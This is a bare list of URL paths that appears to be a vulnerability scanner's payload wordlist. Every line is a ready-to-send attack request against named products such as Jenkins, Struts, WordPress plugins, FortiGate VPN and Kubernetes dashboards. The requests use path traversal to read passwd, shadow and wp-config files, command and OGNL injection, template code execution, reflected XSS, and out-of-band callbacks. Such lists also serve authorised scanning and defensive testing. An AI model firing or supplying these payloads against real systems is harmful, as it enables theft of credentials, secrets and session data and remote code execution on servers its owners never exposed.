/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}
/command.cgi?cat%20/etc/passwd
/.../.../.../.../.../.../.../.../.../windows/win.ini
/...\...\...\...\...\...\...\...\...\windows\win.ini
/..../..../..../..../..../..../..../..../..../windows/win.ini
/....\....\....\....\....\....\....\....\....\windows\win.ini
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
/jkstatus
/jkstatus;
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/img.php?f=/./etc/./passwd
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/index.php?op=fileviewer&file=/etc/passwd
/meta
/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/
/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/api/DownloadUrlResponse.ashx?url=file://C:/windows/win.ini
/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/nuxeo/login.jsp/pwn${31333333330+7}.xhtml
/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
/index.php?q=file:///etc/passwd
/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
/imcat/root/tools/adbug/binfo.php?phpinfo1
/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/_next/../../../../../../../../../etc/passwd
/include/downmix.inc.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html
/api/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow
/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/filemanager/upload.php
/blast/nph-viewgif.cgi?../../../../etc/passwd
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/admin/index.php?module=file_editor&file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine
/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine
/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html
/node_modules/../../../../../etc/passwd
/assets/file:%2f%2f/etc/passwd
//css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini
/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
